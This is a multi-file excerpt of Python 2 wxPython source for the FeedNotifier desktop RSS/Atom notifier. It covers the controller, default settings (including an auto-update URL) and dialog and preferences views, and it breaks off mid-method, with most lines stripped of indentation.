if self.index > 0:
self.index -= 1
self.update(True)
def on_close(self):
self.stop_timer()
self.clear_cache()
event = Event(self, EVT_POPUP_CLOSE)
wx.PostEvent(self, event)
def on_timer(self):
self.timer = None
set_timer = False
if self.hover_count and settings.POPUP_WAIT_ON_HOVER:
set_timer = True
elif self.auto:
if self.index == self.count - 1:
self.on_close()
else:
self.on_next(False)
set_timer = True
if set_timer:
self.set_timer()
|
yabhinav/FeedNotifier | controller.py | import wx
import idle
import feeds
import popups
import view
import updater
import util
import winsound
import socket
from settings import settings
class Controller(object):
def __init__(self):
socket.setdefaulttimeout(settings.SOCKET_TIMEOUT)
self.icon = view.TaskBarIcon(self)
self.manager = feeds.FeedManager()
self.manager.load()
self.add_default_feeds()
self.popup = None
self.polling = False
self.enabled = True
self.on_poll()
self.on_check_for_updates()
def add_default_feeds(self):
if self.manager.feeds:
return
for url in settings.DEFAULT_FEED_URLS:
feed = feeds.Feed(url)
feed.interval = 60 * 60 * 24
self.manager.add_feed(feed)
def parse_args(self, message):
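        # `message` is a newline-separated list of feed URLs, e.g. passed
        # in from another application instance.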
urls = message.split('\n')
for url in urls:
url = url.strip()
if not url:
continue
self.add_feed(url)
def enable(self):
self.icon.set_icon('icons/feed.png')
self.enabled = True
self.poll()
def disable(self):
self.icon.set_icon('icons/feed_disabled.png')
self.enabled = False
def save(self):
self.manager.save()
def on_check_for_updates(self):
try:
self.check_for_updates(False)
finally:
wx.CallLater(1000 * 60 * 5, self.on_check_for_updates)
def check_for_updates(self, force=True):
updater.run(self, force)
def on_poll(self):
try:
self.poll()
finally:
wx.CallLater(1000 * 5, self.on_poll)
def poll(self):
if self.polling:
return
if not self.enabled:
return
if settings.DISABLE_WHEN_IDLE and idle.get_idle_duration() > settings.USER_IDLE_TIMEOUT:
return
if not self.manager.should_poll():
return
self.polling = True
self.icon.set_icon('icons/feed_go.png')
util.start_thread(self._poll_thread)
def _poll_thread(self):
found_new = False
try:
for new_items in self.manager.poll():
found_new = True
wx.CallAfter(self._poll_result, new_items)
finally:
wx.CallAfter(self._poll_complete, found_new)
def _poll_result(self, new_items):
items = self.manager.items
if self.popup:
index = self.popup.index
else:
index = len(items)
items.extend(new_items)
self.show_items(items, index, False)
def _poll_complete(self, found_new):
if found_new:
self.save()
self.polling = False
self.icon.set_icon('icons/feed.png')
def force_poll(self):
for feed in self.manager.feeds:
feed.last_poll = 0
self.poll()
def show_items(self, items, index, focus):
play_sound = False
if not items:
return
if not self.popup:
self.popup = popups.PopupManager()
self.popup.Bind(popups.EVT_POPUP_CLOSE, self.on_popup_close)
if not focus:
play_sound = True
self.popup.set_items(items, index, focus)
if focus:
self.popup.auto = False
if play_sound:
self.play_sound()
def play_sound(self):
if settings.PLAY_SOUND:
path = settings.SOUND_PATH
flags = winsound.SND_FILENAME | winsound.SND_ASYNC
try:
winsound.PlaySound(path, flags)
except Exception:
pass
def show_popup(self):
items = self.manager.items
index = len(items) - 1
self.show_items(items, index, True)
def add_feed(self, url=''):
feed = view.AddFeedDialog.show_wizard(None, url)
if not feed:
return
self.manager.add_feed(feed)
self.save()
self.poll()
def edit_settings(self):
window = view.SettingsDialog(None, self)
window.Center()
window.ShowModal()
window.Destroy()
def close(self):
try:
if self.popup:
self.popup.on_close()
wx.CallAfter(self.icon.Destroy)
finally:
pass #wx.GetApp().ExitMainLoop()
def on_popup_close(self, event):
self.popup = None
self.manager.purge_items(settings.ITEM_CACHE_AGE)
|
yabhinav/FeedNotifier | defaults.py | # Helper Functions
def load_revision():
    try:
        with open('revision.txt', 'r') as f:
            return int(f.read().strip())
    except Exception:
        return -1
# Popup Settings
POPUP_DURATION = 5
POPUP_AUTO_PLAY = True
POPUP_WAIT_ON_HOVER = True
POPUP_THEME = 'default'
POPUP_WIDTH = 400
POPUP_POSITION = (1, 1)
POPUP_TRANSPARENCY = 230
POPUP_TITLE_LENGTH = 120
POPUP_BODY_LENGTH = 400
POPUP_DISPLAY = 0
POPUP_STAY_ON_TOP = True
POPUP_BORDER_SIZE = 3
POPUP_BORDER_COLOR = (0, 0, 0)
# Application Settings
APP_ID = 'FeedNotifier'
APP_NAME = 'Feed Notifier'
APP_VERSION = '2.6.1'
APP_URL = 'http://www.feednotifier.com/'
USER_AGENT = '%s/%s +%s' % (APP_ID, APP_VERSION, APP_URL)
DEFAULT_POLLING_INTERVAL = 60 * 15  # seconds (15 minutes)
USER_IDLE_TIMEOUT = 60  # seconds
DISABLE_WHEN_IDLE = True
ITEM_CACHE_AGE = 60 * 60 * 24 * 1  # seconds (1 day)
FEED_CACHE_SIZE = 1000
MAX_WORKER_THREADS = 10
PLAY_SOUND = True
SOUND_PATH = 'sounds/notification.wav'
SOCKET_TIMEOUT = 15  # seconds
# Initial Setup
DEFAULT_FEED_URLS = [
'http://www.feednotifier.com/welcome.xml',
]
# Proxy Settings
USE_PROXY = False
PROXY_URL = ''
# Updater Settings
LOCAL_REVISION = load_revision()
REVISION_URL = 'http://www.feednotifier.com/update/revision.txt'
INSTALLER_URL = 'http://www.feednotifier.com/update/installer.exe'
CHECK_FOR_UPDATES = True
UPDATE_INTERVAL = 60 * 60 * 24 * 1  # seconds (1 day)
UPDATE_TIMESTAMP = 0
del load_revision
|
yabhinav/FeedNotifier | view.py | <gh_stars>1-10
import wx
import util
import feeds
import filters
from settings import settings
INDEX_ENABLED = 0
INDEX_URL = 1
INDEX_TITLE = 2
INDEX_INTERVAL = 3
INDEX_ITEM_COUNT = 4
INDEX_CLICKS = 5
INDEX_RULES = 1
INDEX_FEEDS = 2
INDEX_IN = 3
INDEX_OUT = 4
class TaskBarIcon(wx.TaskBarIcon):
def __init__(self, controller):
super(TaskBarIcon, self).__init__()
self.controller = controller
self.set_icon('icons/feed.png')
self.Bind(wx.EVT_TASKBAR_LEFT_DOWN, self.on_left_down)
def CreatePopupMenu(self):
menu = wx.Menu()
util.menu_item(menu, 'Add Feed...', self.on_add_feed, 'icons/add.png')
util.menu_item(menu, 'Preferences...', self.on_settings, 'icons/cog.png')
menu.AppendSeparator()
if self.controller.enabled:
util.menu_item(menu, 'Disable Updates', self.on_disable, 'icons/delete.png')
util.menu_item(menu, 'Update Now', self.on_force_update, 'icons/transmit.png')
else:
util.menu_item(menu, 'Enable Updates', self.on_enable, 'icons/accept.png')
item = util.menu_item(menu, 'Update Now', self.on_force_update, 'icons/transmit.png')
item.Enable(False)
menu.AppendSeparator()
util.menu_item(menu, 'Exit', self.on_exit, 'icons/door_out.png')
return menu
def set_icon(self, path):
icon = wx.IconFromBitmap(wx.Bitmap(path))
self.SetIcon(icon, settings.APP_NAME)
def on_exit(self, event):
self.controller.close()
def on_left_down(self, event):
self.controller.show_popup()
def on_force_update(self, event):
self.controller.force_poll()
def on_disable(self, event):
self.controller.disable()
def on_enable(self, event):
self.controller.enable()
def on_add_feed(self, event):
self.controller.add_feed()
def on_settings(self, event):
self.controller.edit_settings()
class AddFeedDialog(wx.Dialog):
@staticmethod
def show_wizard(parent, url=''):
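        # Two-step wizard: AddFeedDialog validates the URL and fetches the
        # feed, then EditFeedDialog lets the user tweak title/link/interval.
        # wx.ID_BACKWARD from the second dialog loops back to the first.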
while True:
window = AddFeedDialog(parent, url)
window.Center()
result = window.ShowModal()
data = window.result
window.Destroy()
if result != wx.ID_OK:
return None
url = data.original_url
entries = util.get(data, 'entries', [])
feed = feeds.Feed(url)
feed.title = util.get(data.feed, 'title', '')
feed.link = util.get(data.feed, 'link', '')
feed.username = util.encode_password(data.username)
            feed.password = util.encode_password(data.password)
feed.interval = util.guess_polling_interval(entries)
window = EditFeedDialog(parent, feed, True)
window.Center()
result = window.ShowModal()
window.Destroy()
if result == wx.ID_BACKWARD:
continue
if result == wx.ID_OK:
return feed
return None
def __init__(self, parent, initial_url=''):
super(AddFeedDialog, self).__init__(parent, -1, 'Add RSS/Atom Feed')
util.set_icon(self)
#self.SetIcon(wx.IconFromBitmap(wx.Bitmap('icons/feed.png')))
self.initial_url = initial_url
self.result = None
panel = self.create_panel(self)
self.Fit()
self.validate()
def get_initial_url(self):
if self.initial_url:
return self.initial_url
        if wx.TheClipboard.Open():
            data = wx.TextDataObject()
            success = wx.TheClipboard.GetData(data)
            wx.TheClipboard.Close()
            if success:
                url = data.GetText()
                if url.startswith('http'):
                    return url
        return ''
def create_panel(self, parent):
panel = wx.Panel(parent, -1)
sizer = wx.BoxSizer(wx.VERTICAL)
controls = self.create_controls(panel)
buttons = self.create_buttons(panel)
line = wx.StaticLine(panel, -1)
sizer.AddStretchSpacer(1)
sizer.Add(controls, 0, wx.ALIGN_CENTER_HORIZONTAL|wx.ALL, 25)
sizer.AddStretchSpacer(1)
sizer.Add(line, 0, wx.EXPAND)
sizer.Add(buttons, 0, wx.EXPAND|wx.ALL, 8)
panel.SetSizerAndFit(sizer)
return panel
def create_controls(self, parent):
sizer = wx.GridBagSizer(8, 8)
label = wx.StaticText(parent, -1, 'Feed URL')
font = label.GetFont()
font.SetWeight(wx.FONTWEIGHT_BOLD)
label.SetFont(font)
value = self.get_initial_url()
value = value.replace('feed:https://', 'https://')
value = value.replace('feed://', 'http://')
url = wx.TextCtrl(parent, -1, value, size=(300, -1))
url.Bind(wx.EVT_TEXT, self.on_text)
status = wx.StaticText(parent, -1, '')
sizer.Add(label, (0, 0), flag=wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_RIGHT)
sizer.Add(url, (0, 1))
sizer.Add(status, (1, 1))
self.url = url
self.status = status
return sizer
def create_buttons(self, parent):
sizer = wx.BoxSizer(wx.HORIZONTAL)
back = wx.Button(parent, wx.ID_BACKWARD, '< Back')
next = wx.Button(parent, wx.ID_FORWARD, 'Next >')
cancel = wx.Button(parent, wx.ID_CANCEL, 'Cancel')
back.Disable()
next.SetDefault()
next.Bind(wx.EVT_BUTTON, self.on_next)
self.next = next
sizer.AddStretchSpacer(1)
sizer.Add(back)
sizer.AddSpacer(4)
sizer.Add(next)
sizer.AddSpacer(16)
sizer.Add(cancel)
return sizer
def validate(self):
if self.url.GetValue():
self.next.Enable()
else:
self.next.Disable()
def on_text(self, event):
self.validate()
def on_next(self, event):
url = self.url.GetValue()
self.lock()
util.start_thread(self.check_feed, url)
def on_valid(self, result):
self.result = result
self.EndModal(wx.ID_OK)
def on_invalid(self):
dialog = wx.MessageDialog(self, 'The URL entered does not appear to be a valid RSS/Atom feed.', 'Invalid Feed', wx.OK|wx.ICON_ERROR)
dialog.Center()
dialog.ShowModal()
dialog.Destroy()
self.unlock()
def on_password(self, url, username, password):
dialog = PasswordDialog(self, username, password)
dialog.Center()
result = dialog.ShowModal()
username = dialog.username.GetValue()
password = dialog.password.GetValue()
dialog.Destroy()
if result == wx.ID_OK:
util.start_thread(self.check_feed, url, username, password)
else:
self.unlock()
def lock(self):
self.url.Disable()
self.next.Disable()
self.status.SetLabel('Checking feed, please wait...')
def unlock(self):
self.url.Enable()
self.next.Enable()
self.status.SetLabel('')
self.url.SelectAll()
self.url.SetFocus()
def check_feed(self, url, username=None, password=None):
d = util.parse(url, username, password)
if not self: # cancelled
return
status = util.get(d, 'status', 0)
if status == 401: # auth required
wx.CallAfter(self.on_password, url, username, password)
elif util.is_valid_feed(d):
d['original_url'] = url
d['username'] = username
d['password'] = password
wx.CallAfter(self.on_valid, d)
else:
wx.CallAfter(self.on_invalid)
class PasswordDialog(wx.Dialog):
def __init__(self, parent, username=None, password=None):
super(PasswordDialog, self).__init__(parent, -1, 'Password Required')
util.set_icon(self)
panel = self.create_panel(self)
if username:
self.username.SetValue(username)
if password:
self.password.SetValue(password)
self.Fit()
self.validate()
def create_panel(self, parent):
panel = wx.Panel(parent, -1)
sizer = wx.BoxSizer(wx.VERTICAL)
controls = self.create_controls(panel)
buttons = self.create_buttons(panel)
sizer.AddStretchSpacer(1)
sizer.Add(controls, 0, wx.ALIGN_CENTER_HORIZONTAL|wx.ALL, 12)
sizer.AddStretchSpacer(1)
sizer.Add(buttons, 0, wx.EXPAND|wx.ALL&~wx.TOP, 12)
panel.SetSizerAndFit(sizer)
return panel
def create_controls(self, parent):
sizer = wx.GridBagSizer(8, 8)
label = wx.StaticText(parent, -1, 'Username')
username = wx.TextCtrl(parent, -1, '', size=(180, -1))
username.Bind(wx.EVT_TEXT, self.on_text)
sizer.Add(label, (0, 0), flag=wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_RIGHT)
sizer.Add(username, (0, 1))
self.username = username
label = wx.StaticText(parent, -1, 'Password')
password = wx.TextCtrl(parent, -1, '', size=(180, -1), style=wx.TE_PASSWORD)
password.Bind(wx.EVT_TEXT, self.on_text)
sizer.Add(label, (1, 0), flag=wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_RIGHT)
sizer.Add(password, (1, 1))
self.password = password
return sizer
def create_buttons(self, parent):
ok = wx.Button(parent, wx.ID_OK, 'OK')
cancel = wx.Button(parent, wx.ID_CANCEL, 'Cancel')
ok.SetDefault()
ok.Disable()
self.ok = ok
sizer = wx.BoxSizer(wx.HORIZONTAL)
sizer.AddStretchSpacer(1)
sizer.Add(ok)
sizer.AddSpacer(8)
sizer.Add(cancel)
return sizer
def validate(self):
if self.username.GetValue() and self.password.GetValue():
self.ok.Enable()
else:
self.ok.Disable()
def on_text(self, event):
self.validate()
class EditFeedDialog(wx.Dialog):
def __init__(self, parent, feed, add=False):
title = 'Add RSS/Atom Feed' if add else 'Edit RSS/Atom Feed'
super(EditFeedDialog, self).__init__(parent, -1, title)
util.set_icon(self)
#self.SetIcon(wx.IconFromBitmap(wx.Bitmap('icons/feed.png')))
self.feed = feed
self.add = add
panel = self.create_panel(self)
self.Fit()
self.validate()
def create_panel(self, parent):
panel = wx.Panel(parent, -1)
sizer = wx.BoxSizer(wx.VERTICAL)
controls = self.create_controls(panel)
if self.add:
buttons = self.create_add_buttons(panel)
else:
buttons = self.create_edit_buttons(panel)
line = wx.StaticLine(panel, -1)
sizer.AddStretchSpacer(1)
sizer.Add(controls, 0, wx.ALIGN_CENTER_HORIZONTAL|wx.ALL, 25)
sizer.AddStretchSpacer(1)
sizer.Add(line, 0, wx.EXPAND)
sizer.Add(buttons, 0, wx.EXPAND|wx.ALL, 8)
panel.SetSizerAndFit(sizer)
return panel
def create_controls(self, parent):
sizer = wx.GridBagSizer(8, 8)
indexes = [0, 1, 3, 5, 7]
labels = ['Feed URL', 'Feed Title', 'Feed Link', 'Polling Interval', 'Border Color']
for index, text in zip(indexes, labels):
label = wx.StaticText(parent, -1, text)
font = label.GetFont()
font.SetWeight(wx.FONTWEIGHT_BOLD)
label.SetFont(font)
sizer.Add(label, (index, 0), flag=wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_RIGHT)
controls = []
for index in indexes[:-2]:
style = wx.TE_READONLY if index == 0 else 0
control = wx.TextCtrl(parent, -1, '', size=(300, -1), style=style)
control.Bind(wx.EVT_TEXT, self.on_text)
sizer.Add(control, (index, 1), (1, 2))
controls.append(control)
url, title, link = controls
self.url, self.title, self.link = controls
url.ChangeValue(self.feed.url)
title.ChangeValue(self.feed.title)
link.ChangeValue(self.feed.link)
url.SetBackgroundColour(parent.GetBackgroundColour())
_interval, _units = util.split_time(self.feed.interval)
interval = wx.SpinCtrl(parent, -1, str(_interval), min=1, max=60, size=(64, -1))
units = wx.Choice(parent, -1)
units.Append('second(s)', 1)
units.Append('minute(s)', 60)
units.Append('hour(s)', 60*60)
units.Append('day(s)', 60*60*24)
units.Select(_units)
self.interval, self.units = interval, units
sizer.Add(interval, (5, 1))
sizer.Add(units, (5, 2))
self.color = color = wx.Button(parent, -1)
color.Bind(wx.EVT_BUTTON, self.on_color)
color._color = self.feed.color
_color = self.feed.color or settings.POPUP_BORDER_COLOR
color.SetBackgroundColour(wx.Color(*_color))
sizer.Add(color, (7, 1))
self.default = default = wx.Button(parent, -1, 'Use Default')
default.Bind(wx.EVT_BUTTON, self.on_default)
sizer.Add(default, (7, 2))
label = wx.StaticText(parent, -1, 'The feed title will be shown in the pop-up window for items from this feed.')
label.Wrap(300)
sizer.Add(label, (2, 1), (1, 2), flag=wx.ALIGN_CENTER_VERTICAL)
label = wx.StaticText(parent, -1, 'The feed link will launch in your browser if you click on the feed title in a pop-up window.')
label.Wrap(300)
sizer.Add(label, (4, 1), (1, 2), flag=wx.ALIGN_CENTER_VERTICAL)
label = wx.StaticText(parent, -1, 'The polling interval specifies how often the application will check the feed for new items. When adding a new feed, the application automatically fills this in by examining the items in the feed.')
label.Wrap(300)
sizer.Add(label, (6, 1), (1, 2), flag=wx.ALIGN_CENTER_VERTICAL)
label = wx.StaticText(parent, -1, 'The color specifies the border color of pop-up windows for this feed, if you want to override the default.')
label.Wrap(300)
sizer.Add(label, (8, 1), (1, 2), flag=wx.ALIGN_CENTER_VERTICAL)
return sizer
def create_add_buttons(self, parent):
sizer = wx.BoxSizer(wx.HORIZONTAL)
back = wx.Button(parent, wx.ID_BACKWARD, '< Back')
next = wx.Button(parent, wx.ID_FORWARD, 'Finish')
cancel = wx.Button(parent, wx.ID_CANCEL, 'Cancel')
next.SetDefault()
next.Bind(wx.EVT_BUTTON, self.on_next)
back.Bind(wx.EVT_BUTTON, self.on_back)
self.next = next
sizer.AddStretchSpacer(1)
sizer.Add(back)
sizer.AddSpacer(4)
sizer.Add(next)
sizer.AddSpacer(16)
sizer.Add(cancel)
return sizer
def create_edit_buttons(self, parent):
sizer = wx.BoxSizer(wx.HORIZONTAL)
next = wx.Button(parent, wx.ID_FORWARD, 'OK')
cancel = wx.Button(parent, wx.ID_CANCEL, 'Cancel')
next.SetDefault()
next.Bind(wx.EVT_BUTTON, self.on_next)
self.next = next
sizer.AddStretchSpacer(1)
sizer.Add(next)
sizer.AddSpacer(8)
sizer.Add(cancel)
return sizer
def validate(self):
controls = [self.url, self.title, self.link]
if all(control.GetValue() for control in controls):
self.next.Enable()
else:
self.next.Disable()
def on_color(self, event):
data = wx.ColourData()
data.SetColour(self.color.GetBackgroundColour())
dialog = wx.ColourDialog(self, data)
if dialog.ShowModal() == wx.ID_OK:
color = dialog.GetColourData().GetColour()
self.color.SetBackgroundColour(color)
self.color._color = (color.Red(), color.Green(), color.Blue())
def on_default(self, event):
self.color.SetBackgroundColour(wx.Color(*settings.POPUP_BORDER_COLOR))
self.color._color = None
def on_text(self, event):
self.validate()
def on_back(self, event):
self.EndModal(wx.ID_BACKWARD)
def on_next(self, event):
url = self.url.GetValue()
title = self.title.GetValue()
link = self.link.GetValue()
interval = int(self.interval.GetValue())
multiplier = self.units.GetClientData(self.units.GetSelection())
interval = interval * multiplier
if interval < 60:
dialog = wx.MessageDialog(self, 'Are you sure you want to check this feed every %d second(s)?\n\nYou might make the website administrator unhappy!' % interval, 'Confirm Polling Interval', wx.YES_NO|wx.NO_DEFAULT|wx.ICON_QUESTION)
result = dialog.ShowModal()
dialog.Destroy()
if result == wx.ID_NO:
return
self.feed.title = title
self.feed.link = link
self.feed.interval = interval
self.feed.color = self.color._color
self.EndModal(wx.ID_OK)
class EditFilterDialog(wx.Dialog):
def __init__(self, parent, model, filter=None):
title = 'Edit Filter' if filter else 'Add Filter'
style = wx.DEFAULT_DIALOG_STYLE | wx.RESIZE_BORDER
super(EditFilterDialog, self).__init__(parent, -1, title, style=style)
util.set_icon(self)
self.model = model
self.filter = filter or feeds.Filter('')
panel = self.create_panel(self)
buttons = self.create_buttons(self)
sizer = wx.BoxSizer(wx.VERTICAL)
sizer.Add(panel, 1, wx.EXPAND|wx.ALL, 8)
sizer.Add(buttons, 0, wx.EXPAND|wx.ALL&~wx.TOP, 8)
self.SetSizerAndFit(sizer)
self.validate()
def create_panel(self, parent):
panel = wx.Panel(parent, -1)
rules = self.create_rules(panel)
options = self.create_options(panel)
sizer = wx.BoxSizer(wx.HORIZONTAL)
sizer.Add(rules, 1, wx.EXPAND)
sizer.AddSpacer(8)
sizer.Add(options, 0, wx.EXPAND)
panel.SetSizer(sizer)
return panel
def create_buttons(self, parent):
ok = wx.Button(parent, wx.ID_OK, 'OK')
cancel = wx.Button(parent, wx.ID_CANCEL, 'Cancel')
sizer = wx.BoxSizer(wx.HORIZONTAL)
sizer.AddStretchSpacer(1)
sizer.Add(ok)
sizer.AddSpacer(8)
sizer.Add(cancel)
ok.SetDefault()
ok.Bind(wx.EVT_BUTTON, self.on_ok)
self.ok = ok
return sizer
def create_rules(self, parent):
box = wx.StaticBox(parent, -1, 'Filter Rules')
box = wx.StaticBoxSizer(box, wx.VERTICAL)
code = wx.TextCtrl(parent, -1, self.filter.code, style=wx.TE_MULTILINE, size=(250, -1))
text = '''
Examples:
-microsoft and -apple (exclude microsoft and apple)
google or yahoo (require google or yahoo)
-author:BoringGuy (search author field only)
'''
text = '\n'.join(line.strip() for line in text.strip().split('\n'))
help = wx.StaticText(parent, -1, text)
box.Add(code, 1, wx.EXPAND|wx.ALL, 8)
box.Add(help, 0, wx.EXPAND|wx.ALL&~wx.TOP, 8)
code.Bind(wx.EVT_TEXT, self.on_event)
self.code = code
return box
def create_options(self, parent):
sizer = wx.BoxSizer(wx.VERTICAL)
box = wx.StaticBox(parent, -1, 'Options')
box = wx.StaticBoxSizer(box, wx.VERTICAL)
match_case = wx.CheckBox(parent, -1, 'Match Case')
match_whole_words = wx.CheckBox(parent, -1, 'Match Whole Words')
match_case.SetValue(not self.filter.ignore_case)
match_whole_words.SetValue(self.filter.whole_word)
box.Add(match_case, 0, wx.ALL, 8)
box.Add(match_whole_words, 0, wx.ALL&~wx.TOP, 8)
sizer.Add(box, 0, wx.EXPAND)
sizer.AddSpacer(8)
box = wx.StaticBox(parent, -1, 'Apply Filter To')
box = wx.StaticBoxSizer(box, wx.VERTICAL)
all_feeds = wx.RadioButton(parent, -1, 'All Feeds', style=wx.RB_GROUP)
selected_feeds = wx.RadioButton(parent, -1, 'Selected Feeds')
if self.filter.feeds:
selected_feeds.SetValue(True)
feeds = wx.CheckListBox(parent, -1, size=(150, 150), style=wx.LB_HSCROLL|wx.LB_EXTENDED)
def cmp_title(a, b):
return cmp(a.title.lower(), b.title.lower())
self.lookup = {}
items = self.model.controller.manager.feeds
for index, feed in enumerate(sorted(items, cmp=cmp_title)):
feeds.Append(feed.title)
self.lookup[index] = feed
feeds.Check(index, feed in self.filter.feeds)
box.Add(all_feeds, 0, wx.ALL, 8)
box.Add(selected_feeds, 0, wx.ALL&~wx.TOP, 8)
box.Add(feeds, 1, wx.ALL&~wx.TOP, 8)
sizer.Add(box, 1, wx.EXPAND)
match_case.Bind(wx.EVT_CHECKBOX, self.on_event)
match_whole_words.Bind(wx.EVT_CHECKBOX, self.on_event)
all_feeds.Bind(wx.EVT_RADIOBUTTON, self.on_event)
selected_feeds.Bind(wx.EVT_RADIOBUTTON, self.on_event)
feeds.Bind(wx.EVT_CHECKLISTBOX, self.on_event)
self.match_case = match_case
self.match_whole_words = match_whole_words
self.all_feeds = all_feeds
self.selected_feeds = selected_feeds
self.feeds = feeds
return sizer
def get_selected_feeds(self):
result = set()
if self.selected_feeds.GetValue():
for index in range(self.feeds.GetCount()):
if self.feeds.IsChecked(index):
result.add(self.lookup[index])
return result
def validate(self):
feeds = self.get_selected_feeds()
valid = True
valid = valid and self.code.GetValue()
valid = valid and (self.all_feeds.GetValue() or feeds)
try:
filters.parse(self.code.GetValue())
except Exception:
valid = False
self.ok.Enable(bool(valid))
self.feeds.Enable(self.selected_feeds.GetValue())
def on_event(self, event):
self.validate()
def on_ok(self, event):
filter = self.filter
filter.code = self.code.GetValue()
filter.ignore_case = not self.match_case.GetValue()
filter.whole_word = self.match_whole_words.GetValue()
filter.feeds = self.get_selected_feeds()
event.Skip()
class Model(object):
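    # Working copy of the feeds, filters and settings edited by the
    # preferences dialog; changes are written back to the live manager
    # via apply().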
def __init__(self, controller):
self.controller = controller
self.reset()
def reset(self):
self._feed_sort = -1
self._filter_sort = -1
feeds = self.controller.manager.feeds
feeds = [feed.make_copy() for feed in feeds]
self.feeds = feeds
filters = self.controller.manager.filters
filters = [filter.make_copy() for filter in filters]
self.filters = filters
self.settings = {}
    def __getattr__(self, key):
        # only called when normal lookup fails; treat ALL_CAPS names as
        # settings and raise AttributeError for everything else
        if key != key.upper():
            raise AttributeError(key)
        if key in self.settings:
            return self.settings[key]
        return getattr(settings, key)
def __setattr__(self, key, value):
if key != key.upper():
return super(Model, self).__setattr__(key, value)
self.settings[key] = value
def apply(self):
self.apply_filters()
self.apply_feeds()
self.apply_settings()
self.controller.save()
def apply_settings(self):
for key, value in self.settings.items():
setattr(settings, key, value)
def apply_feeds(self):
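        # Three-way diff by uuid: feeds only in `after` are added, feeds
        # only in `before` are removed, and the rest are updated in place.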
before = {}
after = {}
controller = self.controller
for feed in controller.manager.feeds:
before[feed.uuid] = feed
for feed in self.feeds:
after[feed.uuid] = feed
before_set = set(before.keys())
after_set = set(after.keys())
added = after_set - before_set
deleted = before_set - after_set
same = after_set & before_set
for uuid in added:
feed = after[uuid]
controller.manager.add_feed(feed)
for uuid in deleted:
feed = before[uuid]
controller.manager.remove_feed(feed)
for uuid in same:
a = before[uuid]
b = after[uuid]
a.copy_from(b)
def apply_filters(self):
before = {}
after = {}
controller = self.controller
for filter in controller.manager.filters:
before[filter.uuid] = filter
for filter in self.filters:
after[filter.uuid] = filter
before_set = set(before.keys())
after_set = set(after.keys())
added = after_set - before_set
deleted = before_set - after_set
same = after_set & before_set
for uuid in added:
filter = after[uuid]
controller.manager.add_filter(filter)
for uuid in deleted:
filter = before[uuid]
controller.manager.remove_filter(filter)
for uuid in same:
a = before[uuid]
b = after[uuid]
a.copy_from(b)
def sort_feeds(self, column):
def cmp_enabled(a, b):
return cmp(a.enabled, b.enabled)
def cmp_clicks(a, b):
return cmp(b.clicks, a.clicks)
def cmp_item_count(a, b):
return cmp(b.item_count, a.item_count)
def cmp_interval(a, b):
return cmp(a.interval, b.interval)
def cmp_title(a, b):
return cmp(a.title.lower(), b.title.lower())
def cmp_url(a, b):
return cmp(a.url.lower(), b.url.lower())
funcs = {
INDEX_ENABLED: cmp_enabled,
INDEX_URL: cmp_url,
INDEX_TITLE: cmp_title,
INDEX_INTERVAL: cmp_interval,
INDEX_CLICKS: cmp_clicks,
INDEX_ITEM_COUNT: cmp_item_count,
}
self.feeds.sort(cmp=funcs[column])
if column == self._feed_sort:
self.feeds.reverse()
self._feed_sort = -1
else:
self._feed_sort = column
def sort_filters(self, column):
def cmp_enabled(a, b):
return cmp(a.enabled, b.enabled)
def cmp_rules(a, b):
return cmp(a.code, b.code)
def cmp_feeds(a, b):
return cmp(len(a.feeds), len(b.feeds))
def cmp_in(a, b):
return cmp(b.inputs, a.inputs)
def cmp_out(a, b):
return cmp(b.outputs, a.outputs)
funcs = {
INDEX_ENABLED: cmp_enabled,
INDEX_RULES: cmp_rules,
INDEX_FEEDS: cmp_feeds,
INDEX_IN: cmp_in,
INDEX_OUT: cmp_out,
}
self.filters.sort(cmp=funcs[column])
if column == self._filter_sort:
self.filters.reverse()
self._filter_sort = -1
else:
self._filter_sort = column
class SettingsDialog(wx.Dialog):
def __init__(self, parent, controller):
title = '%s Preferences' % settings.APP_NAME
style = wx.DEFAULT_DIALOG_STYLE | wx.RESIZE_BORDER
super(SettingsDialog, self).__init__(parent, -1, title, style=style)
util.set_icon(self)
#self.SetIcon(wx.IconFromBitmap(wx.Bitmap('icons/feed.png')))
self.model = Model(controller)
panel = self.create_panel(self)
self.Fit()
self.SetMinSize(self.GetSize())
def create_panel(self, parent):
panel = wx.Panel(parent, -1)
notebook = self.create_notebook(panel)
line = wx.StaticLine(panel, -1)
buttons = self.create_buttons(panel)
sizer = wx.BoxSizer(wx.VERTICAL)
sizer.Add(notebook, 1, wx.EXPAND|wx.ALL, 0)
sizer.Add(line, 0, wx.EXPAND)
sizer.Add(buttons, 0, wx.EXPAND|wx.ALL, 8)
panel.SetSizerAndFit(sizer)
return panel
def create_notebook(self, parent):
images = wx.ImageList(48, 32)
images.Add(util.scale_bitmap(wx.Bitmap('icons/feed32.png'), -1, -1, self.GetBackgroundColour()))
images.Add(util.scale_bitmap(wx.Bitmap('icons/comment32.png'), -1, -1, self.GetBackgroundColour()))
images.Add(util.scale_bitmap(wx.Bitmap('icons/cog32.png'), -1, -1, self.GetBackgroundColour()))
images.Add(util.scale_bitmap(wx.Bitmap('icons/filter32.png'), -1, -1, self.GetBackgroundColour()))
images.Add(util.scale_bitmap(wx.Bitmap('icons/info32.png'), -1, -1, self.GetBackgroundColour()))
notebook = wx.Toolbook(parent, -1)
notebook.SetInternalBorder(0)
notebook.AssignImageList(images)
feeds = FeedsPanel(notebook, self)
popups = PopupsPanel(notebook, self)
options = OptionsPanel(notebook, self)
filters = FiltersPanel(notebook, self)
about = AboutPanel(notebook)
notebook.AddPage(feeds, 'Feeds', imageId=0)
notebook.AddPage(popups, 'Pop-ups', imageId=1)
notebook.AddPage(options, 'Options', imageId=2)
notebook.AddPage(filters, 'Filters', imageId=3)
notebook.AddPage(about, 'About', imageId=4)
self.popups = popups
self.options = options
notebook.Fit()
return notebook
def create_buttons(self, parent):
sizer = wx.BoxSizer(wx.HORIZONTAL)
ok = wx.Button(parent, wx.ID_OK, 'OK')
cancel = wx.Button(parent, wx.ID_CANCEL, 'Cancel')
apply = wx.Button(parent, wx.ID_APPLY, 'Apply')
ok.Bind(wx.EVT_BUTTON, self.on_ok)
apply.Bind(wx.EVT_BUTTON, self.on_apply)
ok.SetDefault()
apply.Disable()
self.apply_button = apply
sizer.AddStretchSpacer(1)
sizer.Add(ok)
sizer.AddSpacer(8)
sizer.Add(cancel)
sizer.AddSpacer(8)
sizer.Add(apply)
return sizer
def apply(self):
self.popups.update_model()
self.options.update_model()
self.model.apply()
self.model.controller.poll()
def on_change(self):
self.apply_button.Enable()
def on_ok(self, event):
